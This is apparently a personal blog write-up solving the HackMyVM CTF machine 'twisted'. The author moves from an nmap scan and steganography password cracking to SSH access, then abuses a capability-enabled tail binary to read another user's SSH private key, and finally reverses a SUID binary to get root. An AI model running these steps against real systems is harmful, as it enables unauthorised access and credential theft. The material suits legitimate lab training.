I have not played any CTF for a long time and while scrolling through discord chats, I found another interesting platform just like Vulnhub, TryHackMe or HTB and  it's name is HackMyVM. I really appreciate the developer of this website for his work, So I decided to solve a CTF challenge from HackMyVM.


Target IP Address :

As usual I started with nmap scan to find open ports and running services in the target machine using the command.

nmap -sC -sV -Pn -p- -T4 --max-rate=1000 -o nmap.txt
80/tcp   open  http    nginx 1.14.2
|_http-server-header: nginx/1.14.2
|_http-title: Site doesn't have a title (text/html).
2222/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)

So I started enumeration from port 80/HTTP and I found a website with two images, which are almost similar to each other but for a CTF player they are not similar at all :)

└─$ ls -l *.jpg
-rw-r--r-- 1 artof artof 288706 Oct 14 12:21 cat-hidden.jpg
-rw-r--r-- 1 artof artof 288693 Oct 14 12:21 cat-original.jpg

I downloaded both the images in my local system using wget command, after that I tried to find some hidden files and directories but failed. Next thought came to my mind was, there is something I need to do with these two images, I found nothing useful in metadata and steghide will only work if I have a password.

While searching about steghide I found a very awesome tool Stegcracker, you can find it online and also the steps to install it, using this tool I was able to crack the password and finally got something useful data in cat-hidden.jpg

└─$ stegcracker cat-hidden.jpg  
StegCracker 2.0.9 - (https://github.com/Paradoxis/StegCracker)
Copyright (c) 2020 - Luke Paris (Paradoxis)

No wordlist was specified, using default rockyou.txt wordlist.
Counting lines in wordlist..
Attacking file 'cat-hidden.jpg' with wordlist '/usr/share/wordlists/rockyou.txt'..
Successfully cracked file with password: ********
Tried 964 passwords
Your file has been written to: cat-hidden.jpg.out

Next, I used the cat command read the contents of file cat-hidden.jpg.out

└─$ cat cat-hidden.jpg.out

Umm a password but for which user? Now we have the password to get hidden data inside the cat-hidden.jpg file so it's the right time to use the steghide tool, so that we can get the actual file which contains the password.

└─$ steghide extract -sf cat-hidden.jpg
Enter passphrase: 
wrote extracted data to "ma***.txt".

This means the password I got in the above steps is of user ma***, and using SSH I can login into the system.

└─$ ssh ma***@ -p 2222
ma***@'s password: 
ma***@twisted:~$ ls

After reading note.txt file I got a .wav file in /var/www/html/. It was morse code, so using an online website I was able to retrieve the actual text but that seems to be of no use, next I thought to run linpeas.

Files with capabilities:
/usr/bin/ping = cap_net_raw+ep
/usr/bin/tail = cap_dac_read_search+ep

This is what I found, now while traversing through home directory I found a user bonita and inside bonita's home directory I found .ssh directory means using tail command I can read the id_rsa file in /home/bonita/.ssh/

ma***@twisted:/home$ /usr/bin/tail -n 100 bonita/.ssh/id_rsa

That's good, now using the private key I can login into the system as user bonita.

└─$ ssh -i id_rsa bonita@ -p 2222
Linux twisted 4.19.0-9-amd64 #1 SMP Debian 4.19.118-2+deb10u1 (2020-06-07) x86_64
bonita@twisted:~$ ls
beroot  user.txt
bonita@twisted:~$ cat user.txt 

Root Shell

So we got our first flag, now for the root I found that binary beroot is SUID, so after executing it asked for the code.

bonita@twisted:~$ ./beroot 
Enter the code:


Now I transfered this binary in my local system and using ghidra I got the actual logic/program of this binary and also the right code.

That's simple, now I just need to enter the right code and then I will get the root shell.

bonita@twisted:~$ ./beroot 
Enter the code:
root@twisted:~# cd /root
root@twisted:/root# cat root.txt

So this completed the challenge, Once again thanks to the developer of HackMyVM and this machine :)

NOTE: The awesome artwork used in this article was created by Chelsea Carlson.